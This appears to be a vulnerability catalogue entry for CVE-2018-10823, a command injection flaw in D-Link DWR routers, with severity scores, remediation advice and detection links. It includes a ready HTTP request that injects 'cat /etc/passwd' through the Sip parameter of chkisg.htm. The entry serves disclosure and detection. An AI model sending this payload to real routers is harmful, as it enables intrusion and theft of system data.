🔙 목록으로 돌아가기

CVE-2018-10823: D-Link Routers - Remote Command Injection

TitleD-Link Routers - Remote Command Injection
Authorwisnupramoedya
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access, data theft, and complete compromise of the affected router.
RemediationApply the latest firmware update provided by D-Link to mitigate this vulnerability.
CVSS Score8.8
EPSS Score0.9396
CVE IDCVE-2018-10823
CWE IDCWE-78
Tags cve cve2018 rce iot dlink router edb seclists vkev vuln

🔍 Vulnerability Description

D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.

🌐 HTTP Request

GET /chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-10823.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-10823.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A